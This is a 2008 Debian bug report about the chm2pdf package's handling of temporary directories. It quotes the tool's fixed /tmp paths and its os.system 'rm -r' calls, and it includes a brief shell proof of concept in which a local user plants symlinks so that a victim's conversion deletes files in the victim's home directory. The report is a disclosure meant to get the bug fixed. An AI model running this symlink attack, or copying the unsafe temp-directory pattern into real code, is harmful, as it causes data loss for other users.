Bug#501959: chm2pdf: Major security (temporary dirs) problems

Sat, 11 Oct 2008 16:49:21 -0700 

Package: chm2pdf
Version: 0.9-2
Severity: grave
Justification: causes non-serious data loss

There are several problems with this package:

1. chm2pdf creates /tmp/chm2pdf/{orig,work}/X directories.  
   (Where X is file basename, foo for foo.chm).

   This makes script unusable for other users, i.e. userA runs chm2pdf
   which creates /tmp/chm2pdf with userA owner, userB has no chance to
   create files there


2. Malicious user could prepare directory structure which upon chm2pdf
   execution could cause serious data loss.

from /usr/bin/chm2pdf:

     CHM2PDF_TEMP_WORK_DIR='/tmp/chm2pdf/work' 
     CHM2PDF_TEMP_ORIG_DIR='/tmp/chm2pdf/orig'
...
     CHM2PDF_WORK_DIR = CHM2PDF_TEMP_WORK_DIR + os.sep + basename
     CHM2PDF_ORIG_DIR = CHM2PDF_TEMP_ORIG_DIR + os.sep + basename
...
     os.system('rm -r '+CHM2PDF_ORIG_DIR+'/*')
     os.system('rm -r '+CHM2PDF_WORK_DIR+'/*')
.

Malicious user could do e.g.

malicious$ mkdir /tmp/chm2pdf/{orig,work}
malicious$ cd /tmp/chm2pdf/orig
malicious$ for f in `find /home/victim/ -iname \*.chm -print`; do
> ln -s /home/victim/ `basename ${f%%.chm}`
> done

And ask user victim to convert any of his own .chm files.


Thanks.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.27-rc7
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages chm2pdf depends on:
ii  htmldoc                     1.8.27-3     HTML processor that generates inde
ii  libchm-bin                  2:0.39-9     library for dealing with Microsoft
ii  python                      2.5.2-2      An interactive high-level object-o
ii  python-chm                  0.8.4-0.1+b1 Python binding for CHMLIB
ii  python-support              0.8.4        automated rebuilding support for P

chm2pdf recommends no packages.

chm2pdf suggests no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Reply via email to